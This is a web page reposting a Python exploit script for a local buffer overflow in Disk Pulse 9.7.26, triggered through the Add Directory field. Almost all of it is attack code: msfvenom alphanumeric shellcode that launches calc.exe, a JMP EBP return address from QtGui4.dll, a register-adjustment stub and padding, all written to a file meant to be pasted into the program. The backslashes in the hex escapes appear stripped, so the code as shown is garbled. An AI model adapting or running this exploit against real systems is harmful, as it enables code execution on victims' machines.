Disk Pulse 9.7.26 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 556

#!/usr/bin/python

###############################################################################
# Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow

###############################################################################
# Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow
# Date: 12-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: Disk Pulse v9.7.26 (Freeware, Pro, Ultimate)
# Vendor Homepage: http://www.diskpulse.com/
# Version: 9.7.14
# Software Link: http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
# 1. Under Directories, click the plus sign
# 2. Paste content of exploit.txt in Add Directory textbox.
#
# <--- Marry and reproduce --->
#
##############################################################################

a = open("exploit.txt", "w")

badchars = "x0ax0dx2f"

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "x0ax0dx2f"
buf = ""
buf += "x50x59x49x49x49x49x49x49x49x49x49x49x49"
buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
buf += "x6bx4cx5ax48x4fx72x57x70x75x50x43x30x43"
buf += "x50x4bx39x4dx35x44x71x79x50x63x54x6ex6b"
buf += "x62x70x76x50x6ex6bx42x72x46x6cx6ex6bx63"
buf += "x62x62x34x6cx4bx43x42x76x48x36x6fx68x37"
buf += "x73x7ax46x46x74x71x49x6fx4ex4cx57x4cx55"
buf += "x31x51x6cx35x52x46x4cx51x30x6ax61x6ax6f"
buf += "x64x4dx67x71x6bx77x79x72x68x72x70x52x70"
buf += "x57x6cx4bx53x62x36x70x6cx4bx52x6ax67x4c"
buf += "x4cx4bx50x4cx62x31x42x58x79x73x32x68x37"
buf += "x71x4ax71x73x61x4ex6bx63x69x31x30x35x51"
buf += "x69x43x4cx4bx50x49x64x58x58x63x46x5ax32"
buf += "x69x6ex6bx36x54x4ex6bx57x71x38x56x65x61"
buf += "x49x6fx6ex4cx69x51x7ax6fx66x6dx46x61x69"
buf += "x57x70x38x39x70x33x45x39x66x35x53x31x6d"
buf += "x68x78x75x6bx73x4dx71x34x70x75x38x64x33"
buf += "x68x4ex6bx32x78x51x34x65x51x39x43x31x76"
buf += "x4cx4bx64x4cx32x6bx6ex6bx62x78x65x4cx47"
buf += "x71x59x43x4cx4bx44x44x4cx4bx56x61x38x50"
buf += "x6fx79x52x64x54x64x34x64x63x6bx73x6bx50"
buf += "x61x50x59x71x4ax56x31x59x6fx59x70x33x6f"
buf += "x53x6fx71x4ax4cx4bx44x52x68x6bx6ex6dx53"
buf += "x6dx62x4ax56x61x4cx4dx6bx35x6dx62x75x50"
buf += "x45x50x75x50x32x70x32x48x76x51x4ex6bx30"
buf += "x6fx6fx77x39x6fx4ex35x4dx6bx58x70x4dx65"
buf += "x4ex42x53x66x62x48x6dx76x4ax35x6dx6dx4d"
buf += "x4dx69x6fx79x45x57x4cx46x66x53x4cx56x6a"
buf += "x6fx70x49x6bx6dx30x33x45x33x35x4dx6bx50"
buf += "x47x37x63x74x32x52x4fx53x5ax43x30x53x63"
buf += "x49x6fx38x55x52x43x63x51x50x6cx65x33x54"
buf += "x6ex62x45x54x38x62x45x55x50x41x41"

# 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:Program FilesDisk PulseinQtGui4.dll)

jmpebp = "x1fx54x1cx65" # Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAABBB, ESP -> AAA (without the BBB part)

llamaleftovers = (
"x55" # push EBP
"x58" # pop EAX
"x05x55x55x55x55" # add EAX, 0x55555555
"x05x55x55x55x55" # add EAX, 0x55555555
"x05x56x56x55x55" # add EAX, 0x55555656 -> EAX = EBP + 0x200
"x40" # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)

junk = "x55" + "x53x5b" * 107

data = "A"*4096 + jmpebp + "x40x48" * 20 + llamaleftovers + junk + buf

a.write(data)
a.close()